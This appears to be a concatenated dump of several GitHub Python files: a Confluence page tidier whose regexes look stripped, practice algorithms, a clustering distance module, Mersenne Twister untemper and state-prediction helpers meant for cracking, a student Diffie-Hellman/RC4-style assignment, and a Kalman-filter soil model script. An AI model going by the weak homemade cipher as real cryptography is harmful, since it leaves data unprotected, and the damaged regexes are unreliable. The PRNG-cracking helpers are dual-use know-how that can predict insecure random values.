(\"FosWiki: 'tok' spans in front of headers\",\n r'(?<=)(|)\\s* ', r'\\1'),\n (\"FosWiki: Section edit icons at the end of headers\",\n r'\\s*'\n r']+>'\n r'(?=)(|)\\s*'\n r'\\s*([^<]+)(?:)\\s*(?=)', r'\\1\\2'),\n (\"FosWiki: 'Edit Chapter Plugin' spans (new)\",\n r'(?<=)(|)\\s*'\n 
r'\\s*([^<]+)(?:)\\s*(?=)', r'\\1\\2'),\n (\"FosWiki: Residual leading whitespace in headers\",\n r'(?<=)(|)\\s* +', r'\\1'),\n (\"FosWiki: Replace TOC div with macro\",\n r'()?
.*?
', '''\n \n Contents\n \n

\n \n

\n
\n
'''),\n (\"FosWiki: Replace TOC in a Twisty with Expand+TOC macro\",\n r'
', '''\n \n Table of Contents\n \n

\n \n

\n
\n
'''),\n (\"FosWiki: Named anchors (#WikiWords)\",\n r'(]+>[^<]+)',\n r'\\1\\2; float: right;\\3'),\n (\"FosWiki: Wrap HTML '
' into 'panel' macro\",\n     r'(?)()',\n     r''\n     r'#eeeeee'\n     r''\n     r'\\1'),\n    (\"FosWiki: Wrap HTML '
' into 'panel' macro\",\n r'(?!)', ''),\n (\"FosWiki: Embedded CSS - custom list indent\",\n r'
    ', '
      '),\n (\"FosWiki: Empty paragraphs\",\n r'

       

      ', r''),\n (\"FosWiki: Obsolete CSS classes\",\n r'(<(?:div|p|span|h[1-5])) class=\"(foswikiTopic)\"', r'\\1'),\n])\n\n\ndef _apply_tidy_regex_rules(body, log=None):\n \"\"\"Return tidied body after applying regex rules.\"\"\"\n body = body.replace(u'\\u00A0', ' ')\n for name, rule, subst in TIDY_REGEX_RULES:\n length = len(body)\n try:\n body, count = rule.subn(subst, body)\n except re.error as cause:\n raise click.LoggedFailure('Error \"{}\" in \"{}\" replacement: {} => {}'.format(\n cause, name, rule.pattern, subst,\n ))\n if count and log:\n length -= len(body)\n log.info('Replaced %d matche(s) of \"%s\" (%d chars %s)',\n count, name, abs(length), \"added\" if length < 0 else \"removed\")\n return body\n\n\ndef _make_etree(body, content_format='storage', attrs=None):\n \"\"\"Create an ElementTree from a page's body.\"\"\"\n attrs = (attrs or {}).copy()\n attrs.update({\n 'xmlns:ac': 'http://www.atlassian.com/schema/confluence/4/ac/',\n 'xmlns:ri': 'http://www.atlassian.com/schema/confluence/4/ri/',\n })\n xml_body = re.sub(r'&(?!(amp|lt|gt|quot|apos))([a-zA-Z0-9]+);',\n lambda cref: '&#{};'.format(htmlentitydefs.name2codepoint[cref.group(2)]), body)\n #print(body.encode('utf8'))\n xmldoc = u'<{root} {attrs}>{body}'.format(\n root=content_format,\n attrs=' '.join('{}={}'.format(k, quoteattr(v)) for k, v in sorted(attrs.items())),\n body=xml_body)\n\n parser = (XMLParser if content_format == 'storage' else HTMLParser)(remove_blank_text=True)\n try:\n return fromstring(xmldoc, parser)\n except XMLSyntaxError as cause:\n raise click.LoggedFailure('{}\\n{}'.format(\n cause, '\\n'.join(['{:7d} {}'.format(i+1, k) for i, k in enumerate(xmldoc.splitlines())])\n ))\n\n\ndef _pretty_xml(body, content_format='storage', attrs=None):\n \"\"\"Pretty-print the given page body and return a list of lines.\"\"\"\n root = _make_etree(body, content_format=content_format, attrs=attrs)\n prettyfied = BytesIO()\n root.getroottree().write(prettyfied, encoding='utf8', pretty_print=True, xml_declaration=False)\n return prettyfied.getvalue().decode('utf8').splitlines()\n\n\nclass ConfluencePage(object):\n \"\"\"A page that holds enough state so it can be modified.\"\"\"\n\n DIFF_COLS = {\n '+': 'green',\n '-': 'red',\n '@': 'yellow',\n }\n\n def __init__(self, cf, url, markup='storage', expand=None):\n \"\"\" Load the given page.\n \"\"\"\n if expand and isinstance(expand, str):\n expand = expand.split(',')\n expand = set(expand or []) | {'space', 'version', 'body.' 
+ markup}\n\n self.cf = cf\n self.url = url\n self.markup = markup\n self._data = cf.get(self.url, expand=','.join(expand))\n self.body = self._data.body[self.markup].value\n\n @property\n def page_id(self):\n \"\"\"The numeric page ID.\"\"\"\n return self._data.id\n\n @property\n def space_key(self):\n \"\"\"The space this page belongs to.\"\"\"\n return self._data.space.key\n\n @property\n def title(self):\n \"\"\"The page's title.\"\"\"\n return self._data.title\n\n @property\n def json(self):\n \"\"\"The full JSON response data.\"\"\"\n return self._data\n\n @property\n def version(self):\n \"\"\"The page's version number in history.\"\"\"\n return self._data.version.number\n\n def etree(self):\n \"\"\"Parse the page's body into an ElementTree.\"\"\"\n attrs = {\n 'id': 'page-' + self._data.id,\n 'href': self._data._links.base + (self._data._links.tinyui or ''),\n 'status': self._data.status,\n 'title': self._data.title,\n }\n return _make_etree(self.body, content_format=self.markup, attrs=attrs)\n\n def tidy(self, log=None):\n \"\"\"Return a tidy copy of this page's body.\"\"\"\n assert self.markup == 'storage', \"Can only clean up pages in storage format!\"\n return _apply_tidy_regex_rules(self.body, log=log)\n\n def update(self, body=None, minor=True):\n \"\"\"Update a page's content.\"\"\"\n assert self.markup == 'storage', \"Cannot update non-storage page markup!\"\n if body is None:\n body = self.body\n if body == self._data.body[self.markup].value:\n return # No changes\n\n data = {\n #'id': self._data.id,\n 'type': 'page',\n 'space': {'key': self.space_key},\n 'title': self.title,\n 'version': dict(number=self.version + 1, minorEdit=minor),\n 'body': {\n 'storage': {\n 'value': body,\n 'representation': self.markup,\n }\n },\n 'expand': 'version',\n }\n response = self.cf.session.put(self._data._links.self, json=data)\n response.raise_for_status()\n ##page = response.json(); print(page)\n result = bunchify(response.json())\n self._data.body[self.markup].value = body\n self._data.version = result.version\n return result\n\n\n def dump_diff(self, changed):\n \"\"\"Dump a diff to terminal between changed and stored body.\"\"\"\n if self.body == changed:\n click.secho('=== No changes to \"{0}\"'.format(self.title), fg='green')\n return\n\n diff = difflib.unified_diff(\n _pretty_xml(self.body, self.markup),\n _pretty_xml(changed, self.markup),\n u'v. {0} of \"{1}\"'.format(self.version, self.title),\n u'v. 
{0} of \"{1}\"'.format(self.version + 1, self.title),\n arrow.get(self._data.version.when).replace(microsecond=0).isoformat(sep=' '),\n arrow.now().replace(microsecond=0).isoformat(sep=' '),\n lineterm='', n=2)\n for line in diff:\n click.secho(line, fg=self.DIFF_COLS.get(line and line[0], None))\n","repo_name":"mam-dev/confluencer","sub_path":"src/confluencer/tools/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":9842,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"7"} +{"seq_id":"4184619568","text":"A = [1, 0, 2, 5, 7, 8]\r\nn = 3\r\ns = set()\r\n\r\nfor i in range(len(A)):\r\n\ttemp = n - A[i]\r\n\tif (temp in s):\r\n\t\tprint(\"(\"+str(A[i])+\",\"+str(temp)+\")\")\r\n\ts.add(A[i])\r\n\r\n\r\n#To find the max cosecutive ones\r\n\r\ndef maxConsequtiveOnes(String):\r\n if String == \"\" :\r\n return 0\r\n max_till_now = 0\r\n ones = []\r\n for i in String:\r\n if i == \"1\":\r\n max_till_now += 1\r\n if i == \"0\":\r\n max_till_now = 0\r\n ones.append(max_till_now)\r\n return max(ones)\r\nprint(maxConsequtiveOnes('101101111'))","repo_name":"shashankshet/PythonPracticePrograms","sub_path":"maxxonsecutiveones.py","file_name":"maxxonsecutiveones.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71137132705","text":"from cmath import nan\nfrom copy import deepcopy\nimport pandas as pd\nimport os,itertools,time,pulp\nfrom joblib import Parallel,delayed\n\ndef calcost(data1,data2):\n data1c=data1.loc['x':'z']\n data2c=data2.loc['x':'z']\n redata=data1c-data2c\n if data1.atom==data2.atom:\n return redata.x**2+redata.y**2+redata.z**2\n return 1000\n\ndef cal_distance_df(clusterdf1,clusterdf2,values=False,histgram=False,method='average',pair_atoms=False):\n cluster1=deepcopy(clusterdf1)\n cluster2=deepcopy(clusterdf2)\n #make cost and constrains\n costs=dict()\n for i,data1 in cluster1.iterrows():\n for j,data2 in cluster2.iterrows():\n cost=calcost(data1,data2)\n costs[(i,j)]=cost\n \n model=pulp.LpProblem('cluster_matching',pulp.LpMinimize)\n f=dict()\n obfunc=list()\n for index,cost in costs.items():\n i,j=index\n f[i,j]=pulp.LpVariable('index{}_{}'.format(i,j),lowBound=0)\n obfunc.append(f[i,j]*cost)\n model+=pulp.lpSum(obfunc)\n\n for i,data1 in cluster1.iterrows():\n model += pulp.lpSum([f[(i,j)] for j,_ in cluster2.iterrows()])==1\n\n for j,data2 in cluster2.iterrows():\n model+= pulp.lpSum([f[(i,j)] for i,_ in cluster1.iterrows()])==1\n\n result=model.solve(pulp.PULP_CBC_CMD(msg = False))\n \n if result==1:\n if values:\n val=list()\n for var_ in f.values():\n if var_.varValue!=0:\n val.append((str(var_),float(var_.varValue)))\n return val\n if histgram:\n hist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n hist.append(var_.varValue*pow(costs[key],0.5))\n return hist\n if pair_atoms:\n pairlist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n site1='{}_{}'.format(cluster1.loc[key[0]].atom,cluster1.loc[key[0]].isite)\n site2='{}_{}'.format(cluster2.loc[key[1]].atom,cluster2.loc[key[1]].isite)\n pairlist.append((site1,site2))\n return pairlist\n dis_=float()\n sumf=float()\n if method=='average':\n for val in f.values():\n sumf+=val.varValue\n for key,val in f.items():\n dis_+=val.varValue*pow(costs[key],0.5)\n return dis_/sumf\n elif method=='max':\n hist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n hist.append(var_.varValue*pow(costs[key],0.5))\n return max(hist)\n else:\n 
return nan\n\n\ndef cal_distance(csv_adress1,csv_adress2,values=False,histgram=False,method='average',pair_atoms=False):\n cluster1=pd.read_csv(csv_adress1,index_col=0)\n cluster2=pd.read_csv(csv_adress2,index_col=0)\n return cal_distance_df(clusterdf1=cluster1,clusterdf2=cluster2,values=values,histgram=histgram,method=method,pair_atoms=pair_atoms)\n\ndef parallel_self_distance(clusterdf,comb,pattern_j,method='average'):\n index_i,index_j=comb\n data_i=clusterdf.loc[index_i]\n data_j=clusterdf.loc[index_j]\n csvi='{}/{}_{}_0.csv'.format(data_i.adress,data_i.cifid,data_i.isite,0)\n csvj='{}/{}_{}_{}.csv'.format(data_j.adress,data_j.cifid,data_j.isite,pattern_j)\n if not (os.path.isfile(csvi) and os.path.isfile(csvj)):\n return ('{}_{}'.format(data_i.cifid,str(data_i.isite)),'{}_{}'.format(data_j.cifid,str(data_j.isite)),0,pattern_j,nan)\n disij=cal_distance(csvi,csvj,method=method)\n return ('{}_{}'.format(data_i.cifid,str(data_i.isite)),'{}_{}'.format(data_j.cifid,str(data_j.isite)),0,pattern_j,disij)\n\ndef make_distance_csv(listadress,resultname,outdir=False):\n tstime=time.perf_counter()\n if type(listadress) is str:\n all_cluster=pd.read_csv(listadress,index_col=0)\n elif type(listadress) is pd.DataFrame:\n all_cluster=listadress\n else:\n print('make_distance_csv error')\n all_index=all_cluster.index.to_list()\n comb=list(itertools.combinations(all_index,2))\n plist=[i for i in range(12)]\n alllen=12\n cont=0\n distance=list()\n for pi in plist:\n cont+=1\n print(\"\\r\"+str(cont)+'/'+str(alllen),end=\"\")\n fstime=time.perf_counter()\n distance_=Parallel(n_jobs=-1)(delayed(parallel_self_distance)(all_cluster,comb_,pi) for comb_ in comb)\n distance+=distance_\n etiem=time.perf_counter()\n #print('\\r\\ncomputation time {}'.format(etiem-fstime))\n disfile_colname=['isite_i','isite_j','pattern_i','pattern_j','distance']\n distancedf=pd.DataFrame(distance,columns=disfile_colname)\n if outdir:\n distancedf.to_csv('{}/{}'.format(outdir,resultname))\n else:\n distancedf.to_csv('{}'.format(resultname))\n print()\n print('output {}'.format(resultname))\n print('total computation time {}'.format(etiem-tstime))\n\ndef remake_distance(distanceadress,resultname=True,error_val=10**-8):\n if resultname:\n diradress=os.path.dirname(distanceadress)\n basename=os.path.basename(distanceadress).replace('.csv','')\n if len(diradress)==0:\n resultname='{}_remake'.format(basename)\n else:\n resultname='{}/{}_remake'.format(diradress,basename)\n distancedf=pd.read_csv(distanceadress,index_col=0)\n distancedf.loc[(distancedf.distance<=error_val),'distance']=0.0\n distancedf.to_csv(resultname)\n return","repo_name":"Kazushige-Takenaka/DCA","sub_path":"Distance_based_on_Cluster_Analysis/distance_func.py","file_name":"distance_func.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71916005342","text":"from operator import lshift, rshift\r\n\r\n# Most of this code was shamelessly stolen from StealthyDev.\r\n# Although I did make some changes here and there and added some functions.\r\n\r\nN = 624\r\nM = 397\r\nMATRIX_A = 0x9908b0df\r\nUPPER_MASK = 0x80000000\r\nLOWER_MASK = 0x7fffffff\r\n\r\ndef unxorshift(x, operator, shift, mask=0xFFFFFFFF):\r\n res = x\r\n for _ in range(32):\r\n res = x ^ (operator(res, shift) & mask)\r\n return res\r\n\r\ndef untemper(random_int):\r\n random_int = unxorshift(random_int, rshift, 18)\r\n random_int = unxorshift(random_int, lshift, 15, 0xefc60000)\r\n random_int = 
unxorshift(random_int, lshift, 7, 0x9d2c5680)\r\n random_int = unxorshift(random_int, rshift, 11)\r\n return random_int\r\n\r\ndef temper(state_int):\r\n state_int ^= (state_int >> 11)\r\n state_int ^= (state_int << 7) & 0x9d2c5680\r\n state_int ^= (state_int << 15) & 0xefc60000\r\n state_int ^= (state_int >> 18)\r\n return state_int\r\n\r\ndef twist(i, i1, i397_or_624):\r\n y = (i & 0x80000000) + (i1 & 0x7fffffff) \r\n next = y >> 1\r\n if (y & 1) == 1:\r\n next ^= 0x9908b0df\r\n return next ^ i397_or_624\r\n\r\ndef new_state_fast(state: list[int]):\r\n '''Equivalent to new_state_slow, but faster'''\r\n mt = state.copy()\r\n for i in range(N):\r\n y = (mt[i] & UPPER_MASK) | (mt[i+1] & LOWER_MASK)\r\n z = mt[(i + M) % N] ^ (y >> 1) ^ (y & 1)*MATRIX_A\r\n mt[i] = z\r\n return mt\r\n\r\ndef new_state_slow(state: list[int]):\r\n '''Equivalent to new_state_fast, but the code is easier to understand for cracking purposes'''\r\n mt = state.copy() + [0]*N\r\n for i in range(N):\r\n y = (mt[i] & UPPER_MASK) | (mt[i+1] & LOWER_MASK)\r\n z = mt[i + M] ^ (y >> 1) ^ (y & 1)*MATRIX_A\r\n mt[i + N] = z\r\n return mt[-N:]\r\n\r\ndef randbits_to_uints(n: int, bits):\r\n assert n.bit_length() <= bits\r\n uints = [(n >> i) % 2**32 for i in range(0, bits, 32)]\r\n\r\n if bits % 32:\r\n uints[-1] <<= 32 - bits % 32\r\n assert uints[-1] < 2**32 # this lends some credence that this part of the code isn't broken\r\n\r\n return uints\r\n\r\ndef uints_to_randbits(uints, bits):\r\n L = len(uints) - 1\r\n n = 0\r\n for i in range(L):\r\n n |= uints[i] << 32*i\r\n\r\n u = uints[-1]\r\n if bits%32:\r\n u >>= (32 - bits%32)\r\n\r\n return n | u << 32*L\r\n","repo_name":"AZ-0/scripts","sub_path":"random/mersenne.py","file_name":"mersenne.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36345371923","text":"import numpy\nimport random\nimport time\n#We will store the values of private keys into private 1 and 2, private 1 and 2\n#will be the output of combined congruential method.\n#We will have alpha and q to obtain the public keys(x1 and x2) for the Diffie\n#Hellman's Algorithm.\n#we will use public keys x1 and x2 to generate secret key.\n#variables y1 and y2 2 random numbers intermediate values in the combined\n#congruential algorithm.\n#variables a1,a2,m1 and m2 are used to generate y1, y2, and x.\n#x holds the list of each generator value, or eachprivate key in this case.\nprivate1=0\nprivate2=0\nalpha=3\nq=353\nx=numpy.zeros(3)\ny1=numpy.zeros(3)\ny2=numpy.zeros(3)\nm1=2147483642\nm2=2147483423\na1=450\na2=234\nwhile True:\n y1[0]=random.randint(1, 2147483641)\n y2[0]=random.randint(1, 2147483422)\n i=0\n x[0]=0\n\n for i in range(2):\n y1[i+1]=(a1*y1[i])%m1\n y2[i+1]=(a2*y2[i])%m2\n x[i+1]=(y1[i+1]-y2[i+1])%(m1-1)\n\n private1=int(x[1]%500)\n private2=int(x[2]%500)\n\n if private10:\n count=(count//8)+1\nelse:\n count=count//8\n\nfor i in range(count\n ):\n block.append([])\n\ni=0\nblock[i].append(cont[0])\nfor j in range(1,len(cont)):\n if i0:\n print(\"\\n\\nThe Block of plain text is:\\n\",block[i-2])\nelse:\n print(\"\\n\\nThe Block of plain text is:\\n\",block[i-1])\n#We will create list s contsining a range from 0-255, and t which will\n#contain our secret key value as discussed earlier. 
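# Editor's aside: a hedged, self-contained sketch (not part of the original
# assignment record) of the textbook RC4 key-scheduling step that the comments
# above describe; rc4_ksa and key_digits are illustrative names, and note the
# assignment's own loop below iterates range(255) rather than the usual 256.
def rc4_ksa(key_digits):
    # S starts as the identity permutation 0..255 and is shuffled under the
    # key, reusing key values cyclically -- the same swap loop as the code below.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key_digits[i % len(key_digits)]) % 256
        S[i], S[j] = S[j], S[i]
    return S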
\nsecretkeylist=numpy.zeros(l)\ns=numpy.zeros(256)\nt=numpy.zeros(256)\nsecretkey=str(secretkey)\nfor i in range(l):\n secretkeylist[i]=int(secretkey[i])\nfor i in range(256):\n s[i]=i\n t[i]=secretkeylist[i%l]\n\nj=0\n#we will find j as a value of j+s[i]+t[i] mod 256 and swap s[i] and s[j]\nfor i in range(255):\n j=int((j+s[i]+t[i])%256)\n temp=s[i]\n s[i]=s[j]\n s[j]=temp\n\n#In the end we get a new s array. Now we will give new values for i and j and again swap s[i] and s[j]\n#we will take the last value as s[t] and store it in k. This k will be used to encrypt the block of plaintext\ni=0\nj=0\nk=0\ncount3=0\nwhile True:\n i=int((i+1)%256)\n if(i==0):\n count3+=1\n if(count3==2):\n break\n j=int((j+s[i])%256)\n \n temp=s[i]\n s[i]=s[j]\n s[j]=temp\n t=int(s[i]+s[j])%256\n k=int(s[t])\n \nif count2>0:\n count=count-2\n pt=block[count]\nelse:\n count=count-1\n pt=block[count]\n \n#We will then take key k and xor with the ascii value of plain text, and convert the new integer list to a character string\n#This new character String is the cipher text.\nptascii=numpy.zeros(len(pt))\nct=numpy.zeros(len(pt))\ncipher=[]\n\nfor i in range(len(pt)):\n ptascii[i]=ord(pt[i])\n ct[i]=int(ptascii[i])^k\n cipher.append(chr(int(ct[i]%26)+97))\ncipher=\"\".join(cipher)\nprint(\"The Encrypted Text is:\",cipher)\ncipher=input(\"Please enter the ciphertext:\")\n#We will ask the user to provide cipher text. We will use the cipher text to generatean integer matrix.\n#We will use the key k to xor the cipher text back to plain text. \nctq=numpy.zeros(len(pt))\nctr=numpy.zeros(len(pt))\nfor i in range(len(pt)):\n ctq[i]=ct[i]//26\n ctr[i]=int((ord(cipher[i])-97)%26)\nplain=[]\npt1=numpy.zeros(len(ct))\nfor i in range(len(ct)):\n pt1[i]=ctq[i]*26+ctr[i]\n pt1[i]=int(pt1[i])^k\n plain.append(chr(int(pt1[i])))\nplain=\"\".join(plain)\nprint(\"The decrypted text is:\",plain)\ntime.sleep(1000)\n","repo_name":"SIDDHARTHSS93/Computer-Security-Assignments","sub_path":"Siddharth_Shyamsunder_1802772/ass2.py","file_name":"ass2.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41008435817","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 20 13:03:54 2018\n\n@author: sbo\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport math\nimport time\nfrom PyFoam.Error import error\nfrom PyFoam.Execution.BasicRunner import BasicRunner\nfrom PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile\nfrom filterpy.kalman import EnsembleKalmanFilter as EnKF\nfrom filterpy.common import Q_discrete_white_noise\nfrom numpy import dot, zeros, ones, eye, outer\nfrom numpy.random import randn\nfrom numpy.random import multivariate_normal\nfrom scipy.linalg import inv\n\n# User selection: nominal model + EnKF or real model + EnKF\n#ans = int(input('Type 1 for (nominalmodel + EnKF), or 2 for (realmodel + EnKF): '))\n#if ans == 1:\n# csvFileNameT = 'nominalmodelT.csv'\n# csvFileNameF = 'nominalmodelF.csv'\n# std_noise_Q = 0.\n# std_noise_R = 0.0025\n\n#elif ans == 2:\n# csvFileNameT = 'realmodel.csv'\n# # User selection: Large Q/R (process noise/measurement noise) or Large R/Q?\n# ans = int(input('Type 1 for large process noise (small measurement noise), or 2 '\n# 'for small process noise (large measurement noise): '))\n# if ans == 1:\n# Q_to_R = 100\n# std_noise_R = 0.001 # 
measurement noise\n# std_noise_Q = std_noise_R * Q_to_R # process noise\n# elif ans == 2:\n# R_to_Q = 100\n# std_noise_Q = 0.001 # process noise\n# std_noise_R = std_noise_Q * R_to_Q # measurements noise\n# else:\n# print('Invalid input')\n#else:\n# print('Invalid input')\n\n##\n##\n##\nstart_time = time.clock()\n\n# Change the time precision written in OpenFoam\ncontrol = ParsedParameterFile('system/controlDict')\ncontrol['timePrecision'] = 10\ncontrol.writeFile()\n# Change the blockMeshDict\nlengthOfField = 5\ndx = 1\nnodesInX = int(lengthOfField/dx)\n\ndepth = 1\ndz = 0.02\nnodesInZ = int(depth/dz)\n\nnumberOfGrids = nodesInX * nodesInX\n#numberOfGrids = 1\nmesh = ParsedParameterFile('constant/polyMesh/blockMeshDict')\nmesh['vertices'] = [[0, 0, 0],\n [lengthOfField, 0, 0],\n [lengthOfField, lengthOfField, 0],\n [0, lengthOfField, 0],\n [0, 0, depth],\n [lengthOfField, 0, depth],\n [lengthOfField, lengthOfField, depth],\n [0, lengthOfField, depth]]\nmesh['blocks'] = ['hex (0 1 2 3 4 5 6 7) ('+str(nodesInX)+' '+str(nodesInX)+' '+str(nodesInZ)+') simpleGrading (1 1 1)']\nmesh.writeFile()\n\n# Read data from CSV files\ncsvFileNameTPlot = 'nominalmodelT_plot.csv'\ncsvFileNameTCal = 'nominalmodelT_cal.csv'\ncsvFileNameF = 'nominalmodelF.csv'\nstd_noise_Q = 0.0\nstd_noise_R = 0.0137\n\n# Parameters of the system\ntimeSpan = 20 # Time\ndt = 86400\n\ndim_u = 1 # Number of inputs\n#dim_z = 1 # Number of measurements\n\nN = 10 # sigma points\n\n# Initial condition\n#h_initialTrue = -0.01\n#h_initialTrue1 = -0.99\nh_initial = -0.5\n#h_iTrue = np.ones(nodesInZ)*h_initialTrue\n#h_iTrue1 = np.ones(nodesInZ)*h_initialTrue1\nh_i = np.ones(nodesInZ*numberOfGrids)*h_initial\nu_i = zeros(dim_u)\n\n# Variance / Covariance\n#stdState = 0.15811 # State covariance\nstdState = 0.025 # State covariance\nstdNoise = 0.0 # Process and measurement covariance\n\n# h function, which maps states matrix into predicted measurements\ndepthOfSensor = [5, 10,15, 20,30,35,40, 45]\nH = zeros(nodesInZ*numberOfGrids)\nif depthOfSensor == []:\n H = ones(nodesInZ*numberOfGrids)\n\nfor item in depthOfSensor:\n node = nodesInZ - 1 - item\n slicePosition = node*numberOfGrids\n H[node*numberOfGrids: (node+1)*numberOfGrids] = 1\n#H = np.ones(nodesInZ*numberOfGrids)\n\n# Number of measurements\ndim_z = 0\nfor element in H:\n if element != 0:\n dim_z += 1\n##\n##\n##\n \n# Define EnKF\n#xTrue = np.array(h_iTrue)\n#xTrue1 = np.array(h_iTrue1)\nx = np.array(h_i)\nu = np.array(u_i)\nP = np.eye(nodesInZ*numberOfGrids) * stdState * stdState\n\nf = EnKF(x=x, u=u, P=P, dim_z=dim_z, N=N)\nf.R *= std_noise_R ** 2\nf.Q *= std_noise_Q ** 2\nensemble = f.initialize(x=x, P=P)\n\n# Generating lists for data collection and for plots\nthetaList = []\nThetaListOne = []\nThetaListAll = []\n\nThetaU = []\nThetaUR = []\nThetaListMeanU = []\nmeasurementListTPlot = []\nmeasurementListTCal = []\nmeasurementListF = []\nmeasurementSensorList = []\nThetaListMeanUForPlot = []\nThetaListMeanUAllForPlot = []\n\nresultsTCal = []\nwith open(csvFileNameTCal) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsTCal.append(row)\nfor i in range(len(resultsTCal)):\n measurementListTCal.append(resultsTCal[i])\n for index, item in enumerate(measurementListTCal[i]):\n measurementListTCal[i][index] = float(item) \n \nresultsTPlot = []\nwith open(csvFileNameTPlot) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsTPlot.append(row)\nfor i in range(len(resultsTPlot)):\n measurementListTPlot.append(resultsTPlot[i])\n for index, 
item in enumerate(measurementListTPlot[i]): # Actually elements in resultTPlot are floats \n measurementListTPlot[i][index] = float(item)\n \nresultsF = []\nwith open(csvFileNameF) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsF.append(row)\nfor i in range(len(resultsF)):\n measurementListF.append(resultsF[i])\n for index, item in enumerate(measurementListF[i]):\n measurementListF[i][index] = float(item)\n\n## Change the time precision written in OpenFoam\n#control = ParsedParameterFile('system/controlDict')\n#control['timePrecision'] = 10\n\n# Prediction using the model\nblockRun=BasicRunner(argv=[\"blockMesh\"],\n silent=True,\n server=False)\nprint (\"Running blockMesh\")\nblockRun.start()\nif not blockRun.runOK():\n error(\"There was a problem with blockMesh\")\n \nprint (\"Running RichardsFoam2\")\n#for n in range(numberOfGrids):\n# print('Grids number: ', n+1)\nfor k in range(timeSpan): # N ensemble member \n print('EnKF 7')\n print('At day: ', k+1)\n ThetaListAll = []\n for i in range(N):\n print('Ensemble number: ', i+1)\n ThetaListOne = [] \n for j in range(1):\n control[\"startTime\"] = k*86400 \n control[\"endTime\"] = (k+1)*86400\n \n control.writeFile()\n\n state = ParsedParameterFile(str(control[\"startTime\"])+'/psi')\n if k == 0: \n nonuniform = []\n for l in range(len(ensemble[i])):\n nonuniform.append(str(ensemble[i, l])+'\\n')\n state[\"internalField\"] = ' nonuniform List\\n' +\\\n str(len(nonuniform))+'\\n' +\\\n str('(\\n') + ''.join(nonuniform)+\\\n str(')') \n state.writeFile()\n else:\n nonuniform1 = []\n Positive = []\n for m in range(len(ThetaU[i])):\n nonuniform1.append(str(ThetaU[i][m])+'\\n')\n state[\"internalField\"] = ' nonuniform List\\n' +\\\n str(len(nonuniform1))+'\\n' +\\\n str('(\\n') + ''.join(nonuniform1)+\\\n str(')') \n for index, item in enumerate(nonuniform1):\n if float(item) >= 0:\n Positive.append([index, item])\n state.writeFile()\n\n theRun=BasicRunner(argv=[\"RichardsFoam2_PF\"],\n silent=True)\n theRun.start()\n print('At day: ', k+1)\n \n thetaList = []\n c = False\n c0 = 1\n Theta = open(str(control[\"endTime\"])+'/psi', 'r')\n csvReader = csv.reader(Theta)\n for line in Theta:\n if line == '(\\n':\n c = True\n c0 = 0\n if line in [')\\n', ');', ');\\n']:\n c = False\n break\n if c == True & c0 == 1:\n line.rstrip()\n line_float = float(line)\n thetaList.append(line_float) \n c0 = 1 \n ThetaListOne.append(thetaList)\n ThetaListAll.extend(ThetaListOne)\n# End of calculation\n \n ThetaListAll = np.array(ThetaListAll)\n# meanValueP = np.mean(ThetaListAll, axis=0)\n# ThetaListMean.append(meanValueP)\n \n\n measurement = measurementListTCal[k]\n measurementArray = np.array(measurement)\n measurementArray = measurementArray + randn()*std_noise_R\n if dim_z == 1: # seems useless. 
dim_z ==1 only happens when working with 1D EnKF\n measurementSensor = measurementArray[depthOfSensor]\n elif dim_z == nodesInZ*numberOfGrids:\n measurementSensor = measurementArray\n else:\n l = 0\n measurementSensor = np.ones(dim_z)\n for index, item in enumerate(H):\n if item != 0:\n measurementSensor[l] = measurementArray[index]\n l += 1\n measurementSensorList.append(measurementSensor)\n ThetaU = f.update(ThetaListAll, measurementSensor, H)\n# ThetaUR = []\n# for i in range(len(ThetaU)):\n# ThetaU1 = ThetaU[i]#[::-1]\n# ThetaUR.append(ThetaU1)\n ThetaMeanU = np.mean(ThetaU, axis=0)\n ThetaListMeanU.append(ThetaMeanU)\n\n\n# depthList\ndepthList = []\nfor i in range(0,depth*nodesInZ):\n depthList.append(-1*i*dz)\nxTrue1 = ones(nodesInZ)*-0.2\nxTrue5 = ones(nodesInZ)*-0.8\nxF = ones(nodesInZ)*-0.5\n\nfor i in range(timeSpan):\n ThetaListMeanUForPlot = []\n for j in range(numberOfGrids):\n l = j\n ThetaListMeanT1Grid = []\n for k in range(nodesInZ): \n value = ThetaListMeanU[i][l]\n ThetaListMeanT1Grid.append(value)\n l += numberOfGrids\n ThetaListMeanT1GridR = ThetaListMeanT1Grid[::-1]\n ThetaListMeanUForPlot.append(ThetaListMeanT1GridR)\n ThetaListMeanUAllForPlot.extend(ThetaListMeanUForPlot)\n\n## ThetaListMeanU\n#plotU1Day = []\n#plotUAll = []\n#for i in range(timeSpan):\n# plotU1Day = []\n# for j in range(numberOfGrids):\n# plotU = ThetaListMeanU[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotU1Day.append(plotU)\n# plotUAll.extend(plotU1Day)\n\n## measurementListF\n#plotF1Day = []\n#plotFAll = []\n#for i in range(timeSpan):\n# plotF1Day = []\n# for j in range(numberOfGrids):\n# plotF = measurementListF[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotF1Day.append(plotF)\n# plotFAll.extend(plotF1Day)\n \n## measurementListTCal\n#plotT1Day = []\n#plotTAll = []\n#for i in range(timeSpan):\n# plotT1Day = []\n# for j in range(numberOfGrids):\n# plotT 